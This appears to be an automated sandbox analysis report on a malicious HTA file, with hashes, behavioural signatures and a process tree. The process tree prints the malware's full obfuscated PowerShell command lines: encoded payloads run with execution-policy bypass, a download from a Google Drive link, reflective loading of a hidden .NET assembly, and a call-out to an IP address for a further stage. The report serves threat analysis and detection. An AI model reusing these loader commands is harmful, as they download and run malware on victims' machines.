Analysis
max time kernel: 118s
max time network: 122s
platform: windows7_x64
resource: win7-20241010-en
resource tags: arch:x64 arch:x86 image:win7-20241010-en locale:en-us os:windows7-x64 system
submitted: 29-10-2024 12:37
Static task: static1
Behavioral task: behavioral1
  Sample: seethebestthignswhichgivingbestthingstogetmakeuveryhappy.hta
  Resource: win7-20241010-en
Behavioral task: behavioral2
  Sample: seethebestthignswhichgivingbestthingstogetmakeuveryhappy.hta
  Resource: win10v2004-20241007-en
General
Target: seethebestthignswhichgivingbestthingstogetmakeuveryhappy.hta
Size: 131KB
MD5: 196fb761aa0f295e150b75bd8ad638b4
SHA1: c209ef825b7f80e43f3c904efbc2df582117eeb0
SHA256: 86f7ef2ea14259c52d1fe1627978ef45a94fc4234c7328a1492da55a400703d6
SHA512: 38b7eaff75c6d2cc3b5da4ebb6c345247d35d44b29804c67227404942075db9abf6466716122be3cc4bcb7c8188e0aa3c3b69d9459fd1cff8f5177eaae028b85
SSDEEP: 96:4vCt7evwlevO+D4xMUrwKtkTt0cZPeIvdDveRAz5hg3vBQ:4vCFUWUiXwK2TpSbBQ
Malware Config
Extracted
https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur
Signatures

Blocklisted process makes network request (3 IoCs)
flow 3: PID 2872 poWERSHELl.eXE
flow 6: PID 2884 powershell.exe
flow 8: PID 2884 powershell.exe

Command and Scripting Interpreter: PowerShell (1 TTPs, 2 IoCs)
Run PowerShell and hide display window.
PID 2884 powershell.exe
PID 3008 powershell.exe

Evasion via Device Credential Deployment (2 IoCs)
PID 2872 poWERSHELl.eXE
PID 2744 powershell.exe

Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 2 IoCs)
flow 6: drive.google.com
flow 5: drive.google.com

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).
System Location Discovery: System Language Discovery (1 TTPs, 8 IoCs)
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language by: csc.exe, cvtres.exe, WScript.exe, powershell.exe, powershell.exe, mshta.exe, poWERSHELl.eXE, powershell.exe

Modifies Internet Explorer settings
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main by mshta.exe
Suspicious behavior: EnumeratesProcesses (6 IoCs)
PID 2872 poWERSHELl.eXE
PID 2744 powershell.exe
PID 2872 poWERSHELl.eXE
PID 2872 poWERSHELl.eXE
PID 3008 powershell.exe
PID 2884 powershell.exe

Suspicious use of AdjustPrivilegeToken (4 IoCs)
Token: SeDebugPrivilege, PID 2872 poWERSHELl.eXE
Token: SeDebugPrivilege, PID 2744 powershell.exe
Token: SeDebugPrivilege, PID 3008 powershell.exe
Token: SeDebugPrivilege, PID 2884 powershell.exe

Suspicious use of WriteProcessMemory (28 IoCs; each of the seven parent/child writes below is recorded four times in the raw table)
PID 2472 mshta.exe wrote to memory of PID 2872 (procid_target 30)
PID 2872 poWERSHELl.eXE wrote to memory of PID 2744 (procid_target 32)
PID 2872 poWERSHELl.eXE wrote to memory of PID 2752 (procid_target 33)
PID 2752 csc.exe wrote to memory of PID 2828 (procid_target 34)
PID 2872 poWERSHELl.eXE wrote to memory of PID 760 (procid_target 36)
PID 760 WScript.exe wrote to memory of PID 3008 (procid_target 37)
PID 3008 powershell.exe wrote to memory of PID 2884 (procid_target 39)
Processes

C:\Windows\SysWOW64\mshta.exe (depth 1, PID 2472)
Command line: C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\seethebestthignswhichgivingbestthingstogetmakeuveryhappy.hta"
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory

C:\Windows\SysWOW64\WinDOWSpoWErSheLl\v1.0\poWERSHELl.eXE (depth 2, PID 2872)
Command line: "C:\Windows\systEm32\WinDOWSpoWErSheLl\v1.0\poWERSHELl.eXE" "PoWeRSheLL -EX bYPAsS -nOp -W 1 -c DeVIcECRedenTiAlDEploymeNT.eXe ; iex($(Iex('[SYsTeM.TeXt.ENCODinG]'+[chAR]58+[chAR]58+'UTF8.geTStRING([SysteM.CONVERT]'+[CHAR]0x3a+[cHAr]0X3A+'fRomBaSe64STring('+[ChAr]34+'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'+[CHAr]0x22+'))')))"
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (depth 3, PID 2744)
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYPAsS -nOp -W 1 -c DeVIcECRedenTiAlDEploymeNT.eXe
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe (depth 3, PID 2752)
Command line: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\1jhmi1uz.cmdline"
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe (depth 4, PID 2828)
Command line: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4403.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC43F3.tmp"
- System Location Discovery: System Language Discovery

C:\Windows\SysWOW64\WScript.exe (depth 3, PID 760)
Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\picturewithgreatnewswithgoodthingstohapp.vbS"
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (depth 4, PID 3008)
Command line:
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnR1ZDaW1hZ2VVcmwnKycgPSBTcHJodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd24nKydsbycrJ2FkJmlkPTFBSVZnSkpKdjFGNicrJ3ZTNHNVT3libkgtc0R2VWhCWXd1ciBTcHI7R1ZDd2ViQ2xpJysnZW4nKyd0ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtHVkNpbWFnZUJ5dGVzID0nKycgR1ZDd2ViQ2xpZW50LkRvd24nKydsb2FkJysnRGF0YScrJyhHVkNpbWFnZVVybCknKyc7R1ZDaW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoR1ZDaW1hZycrJ2VCeXRlcyk7R1YnKydDc3RhcnRGbGFnID0gU3ByPDxCQVNFNjRfU1RBUlQ+PlNwcjtHVkNlbmRGbGFnID0gU3ByPCcrJzxCQVNFNjRfRU5EPj5TcHI7R1ZDc3RhcnRJbmRleCA9IEdWQ2ltYWdlVGV4dC5JbicrJ2RleE9mKEdWQ3N0YXJ0RmxhZyk7R1ZDZW5kSW5kZXggPSBHVkNpJysnbWFnZVRleHQuSW5kZXhPZihHVkNlbmRGbGFnKTtHVkNzdGFydEluZGUnKyd4IC1nZSAwIC1hbmQgR1ZDZScrJ25kSW5kZXggLWd0IEdWQ3MnKyd0YXJ0SW5kZXg7R1ZDc3RhcnRJbmRleCArPSBHVkNzdGFydEZsYWcuTGVuZ3RoO0dWQ2Jhc2U2NExlbmd0aCA9IEdWQ2VuZEluZGV4IC0gR1ZDc3RhcicrJ3RJbmRleDtHVkNiYXNlNjRDb21tYW5kID0gR1ZDaW1hZ2VUZXh0JysnLlN1YnN0cmluZycrJyhHVkNzdGFydEluZGV4LCBHVkNiYXNlNjRMZW5ndGgpO0dWQ2Jhc2U2NFJldmVyc2VkID0gJysnLWpvaW4gKEdWQ2Jhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBUMHggRm9yRWFjaC1PYmplY3QgeyBHJysnVkNfIH0pWy0xLi4tKEdWQ2Jhc2U2NENvbW1hbmQuTGVuZ3RoKV07R1ZDYycrJ29tbWFuZEJ5dGVzID0gW1N5cycrJ3QnKydlbS5Db252ZXJ0XTo6RnJvbUJhcycrJ2U2NFN0cmluZyhHVkNiYXNlNjRSZXZlcnNlZCk7R1ZDbG9hZGVkQXNzZW1ibHkgPSAnKydbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZScrJ21ibHldOjpMb2FkKEdWQ2NvbW1hbmRCeXRlcyk7R1ZDdmFpJysnTWV0aG9kID0gW2RuJysnbGliLklPLkhvbWVdLkdldE1ldGhvZChTcHJWQUlTcHIpO0dWQ3ZhaU1ldGhvZC5JbnZva2UoR1ZDbnVsbCwgQChTcHJ0eHQuU0dPTEtMLzMyNC81NTEuODcxLjY0Ljg5MS8vOnB0dGhTcHIsIFNwcmRlc2F0aXZhZG9TcHIsIFNwcmRlc2F0aXZhZG9TcHIsIFNwcmRlc2F0aXZhZG9TcHIsIFNwckNhc1BvbFNwciwgUycrJ3ByZGVzYXRpdmFkb1NwciwgU3ByZGUnKydzYXRpJysndmFkb1NwcixTcHJkZXNhdGl2YWRvU3ByLFNwJysncmRlc2F0aScrJ3ZhZG9TcHIsU3ByZGVzYXRpdmFkb1NwcixTcHJkZXNhdGl2YWRvU3ByLFNwcmRlc2F0aXZhZG9TcHIsJysnU3ByMVNwcixTcHJkZXNhdGl2YWRvU3ByKSk7JykgLWNyRVBMQWNFIChbY2hhcl0
4NCtbY2hhcl00OCtbY2hhcl0xMjApLFtjaGFyXTEyNCAtUkVwbGFjZSAoW2NoYXJdNzErW2NoYXJdODYrW2NoYXJdNjcpLFtjaGFyXTM2ICAtY3JFUExBY0UgKFtjaGFyXTgzK1tjaGFyXTExMitbY2hhcl0xMTQpLFtjaGFyXTM5KSB8IElleA==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID: 3008

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (depth 5, PID 2884)
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('GVCimageUrl'+' = Sprhttps://drive.google.com/uc?export=down'+'lo'+'ad&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvUhBYwur Spr;GVCwebCli'+'en'+'t = New-Object System.Net.WebClient;GVCimageBytes ='+' GVCwebClient.Down'+'load'+'Data'+'(GVCimageUrl)'+';GVCimageText = [System.Text.Encoding]::UTF8.GetString(GVCimag'+'eBytes);GV'+'CstartFlag = Spr<<BASE64_START>>Spr;GVCendFlag = Spr<'+'<BASE64_END>>Spr;GVCstartIndex = GVCimageText.In'+'dexOf(GVCstartFlag);GVCendIndex = GVCi'+'mageText.IndexOf(GVCendFlag);GVCstartInde'+'x -ge 0 -and GVCe'+'ndIndex -gt GVCs'+'tartIndex;GVCstartIndex += GVCstartFlag.Length;GVCbase64Length = GVCendIndex - GVCstar'+'tIndex;GVCbase64Command = GVCimageText'+'.Substring'+'(GVCstartIndex, GVCbase64Length);GVCbase64Reversed = '+'-join (GVCbase64Command.ToCharArray() T0x ForEach-Object { G'+'VC_ })[-1..-(GVCbase64Command.Length)];GVCc'+'ommandBytes = [Sys'+'t'+'em.Convert]::FromBas'+'e64String(GVCbase64Reversed);GVCloadedAssembly = '+'[System.Reflection.Asse'+'mbly]::Load(GVCcommandBytes);GVCvai'+'Method = [dn'+'lib.IO.Home].GetMethod(SprVAISpr);GVCvaiMethod.Invoke(GVCnull, @(Sprtxt.SGOLKL/324/551.871.64.891//:ptthSpr, SprdesativadoSpr, SprdesativadoSpr, SprdesativadoSpr, SprCasPolSpr, S'+'prdesativadoSpr, Sprde'+'sati'+'vadoSpr,SprdesativadoSpr,Sp'+'rdesati'+'vadoSpr,SprdesativadoSpr,SprdesativadoSpr,SprdesativadoSpr,'+'Spr1Spr,SprdesativadoSpr));') -crEPLAcE ([char]84+[char]48+[char]120),[char]124 -REplace ([char]71+[char]86+[char]67),[char]36 -crEPLAcE ([char]83+[char]112+[char]114),[char]39) | Iex"
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID: 2884
Network
MITRE ATT&CK Enterprise v15
Downloads